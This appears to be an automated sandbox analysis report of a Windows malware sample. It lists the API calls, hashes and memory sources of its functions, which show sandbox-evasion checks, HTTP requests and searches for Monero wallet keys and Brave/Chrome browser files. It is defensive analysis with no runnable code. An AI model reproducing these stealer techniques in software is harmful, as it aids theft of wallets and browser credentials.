                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2931873225-0
                        • Opcode ID: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
                        • Instruction ID: d5c4f1bd82f38b69b91021cef487c75f9839e3a0866db010f564d4b6d5d3740c
                        • Opcode Fuzzy Hash: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
                        • Instruction Fuzzy Hash: 95313E70910209AADB84F7F0DC56BEE777AAF06300F20461EF212A6192DF745D05CFAA

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        • Control-flow graph for the OpenEventA / CreateEventA / Sleep / ExitProcess routine (graph rendering not reproduced; node and edge list omitted)
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006A6AF9
                        • Sleep.KERNEL32(00001770), ref: 006A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
                        • ExitProcess.KERNEL32 ref: 006A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
                        • Instruction ID: 17288c1fb91ffb6f1e878413d2ae3e205b98e15a799610a71b85d5b5b67a2a0e
                        • Opcode Fuzzy Hash: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
                        • Instruction Fuzzy Hash: 10F05E30A40209ABE740BBA0DD06BBE7BB5FB06701F24461ABA13A11C1DBB05D41DE6A

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 460ab39672556f5cc4162ae9091f9f217f9f0a517fedb33878d5e701c408407e
                        • Instruction ID: be36fa09bf8d8cae54f8d455a69cc187902a13a1cc613f49c6d9f81d6560e698
                        • Opcode Fuzzy Hash: 460ab39672556f5cc4162ae9091f9f217f9f0a517fedb33878d5e701c408407e
                        • Instruction Fuzzy Hash: D8215EB1D01209ABDF14EFA4EC45BDE7B75FB05320F108629F915A7291EB706A0ACF81

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                          • Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                          • Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                          • Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                          • Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                          • Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
                        • Instruction ID: 8a6a0cc220ce26a1bba29950caf4330d8072dce9de8b4fbaca82e409695d226c
                        • Opcode Fuzzy Hash: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
                        • Instruction Fuzzy Hash: D5112E70900108ABCB94FFA4DD52AED737AAF52340F90415DF90B5A592EF34AF06CE95

                        Control-flow Graph

                        • Block 1493: 691220-691247, call 6a89b0, GlobalMemoryStatusEx; edges: 1493->1496, 1493->1497
                        • Block 1496: 691249-691271, call 6ada00 * 2; edge: 1496->1499
                        • Block 1497: 691273-69127a; edge: 1497->1499
                        • Block 1499: 691281-691285; edges: 1499->1501, 1499->1502
                        • Block 1501: 69129a-69129d
                        • Block 1502: 691287; edges: 1502->1504, 1502->1505
                        • Block 1504: 691289-691290; edges: 1504->1501, 1504->1505
                        • Block 1505: 691292-691294, ExitProcess
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
                        • ExitProcess.KERNEL32 ref: 00691294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
                        • Instruction ID: b120ba5b8a706af356c51775edc29c15c781579392118eff118098a875adc99c
                        • Opcode Fuzzy Hash: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
                        • Instruction Fuzzy Hash: 930162B0D40308BBDF10EBD4CC49B9EBB7DAB05701F308149E705BA6C0D7745A818B59
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
                        • Instruction ID: 8007cfe01c93950f1203c5efa1ddae98d6dbb91b2b70e65d3cc28569b862a39e
                        • Opcode Fuzzy Hash: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
                        • Instruction Fuzzy Hash: 6C0186B1904204EFC714EF94DD45BABFBB8F705B11F10422AF945E3280C37559008BA1
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
                        • ExitProcess.KERNEL32 ref: 00691143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
                        • Instruction ID: dca99fcc5597cb549ee226a7c0b871d762300e1592bc26c2c6d4db394eebddeb
                        • Opcode Fuzzy Hash: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
                        • Instruction Fuzzy Hash: 82E0867094630CFFEB146BA19C0EB08777CBB04B01F300155FB087A5C0CAB526009699
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006910B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006910F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
                        • Instruction ID: 2f885508560eb3147bf85ba41b9233855b7396c67be83b70d7ed345f3221c916
                        • Opcode Fuzzy Hash: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
                        • Instruction Fuzzy Hash: C5F0E971641204BBEB149AA49C49FEFB7DCE705715F300548F504E7380D5725E00DA64
                        APIs
                          • Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                          • Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                          • Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                          • Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                          • Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                          • Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                        • ExitProcess.KERNEL32 ref: 006911C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
                        • Instruction ID: 069b4097e3ab851f671e0b413abcd8490f37df45d57493c7641bfed0db800985
                        • Opcode Fuzzy Hash: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
                        • Instruction Fuzzy Hash: 64E012B5E1430667CE4473F0BC0AB2A339EAB16745F24053DFA05D7602FE29EC00896E
                        APIs
                        • wsprintfA.USER32 ref: 006A38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A38E3
                        • lstrcat.KERNEL32(?,?), ref: 006A3935
                        • StrCmpCA.SHLWAPI(?,006B0F70), ref: 006A3947
                        • StrCmpCA.SHLWAPI(?,006B0F74), ref: 006A395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A3C67
                        • FindClose.KERNEL32(000000FF), ref: 006A3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 2d765703e18634c78011aa54b06bd933565cfdbb600346cb2bf94e1a92639efd
                        • Instruction ID: 20e52f465083ef5fd0fac77f294b9d47b1ae6227ce56a8850a7838f7d2aead7f
                        • Opcode Fuzzy Hash: 2d765703e18634c78011aa54b06bd933565cfdbb600346cb2bf94e1a92639efd
                        • Instruction Fuzzy Hash: 96A141B1A002189BDB64EFA4DC85FFA737DBB55300F044599B60D96241EB749B84CF62
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,006B0B32,006B0B2B,00000000,?,?,?,006B13F4,006B0B2A), ref: 0069BEF5
                        • StrCmpCA.SHLWAPI(?,006B13F8), ref: 0069BF4D
                        • StrCmpCA.SHLWAPI(?,006B13FC), ref: 0069BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0069C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 319c7a2a0fdec23b515ffa32505662343665e4e32e61e2d8ddaceb5b6141c000
                        • Instruction ID: 907bcddabd7be63391425107170f1cb041b3818e40ffaf6835fa826e699cad55
                        • Opcode Fuzzy Hash: 319c7a2a0fdec23b515ffa32505662343665e4e32e61e2d8ddaceb5b6141c000
                        • Instruction Fuzzy Hash: 36425272910104ABCF94FBA0DD96EEE737EAB85300F40455DB90A96181EF349F49CFA6
                        APIs
                        • wsprintfA.USER32 ref: 006A492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                        • StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                        • StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                        • FindClose.KERNEL32(000000FF), ref: 006A4B92
                        Strings
                        Memory Dump Source
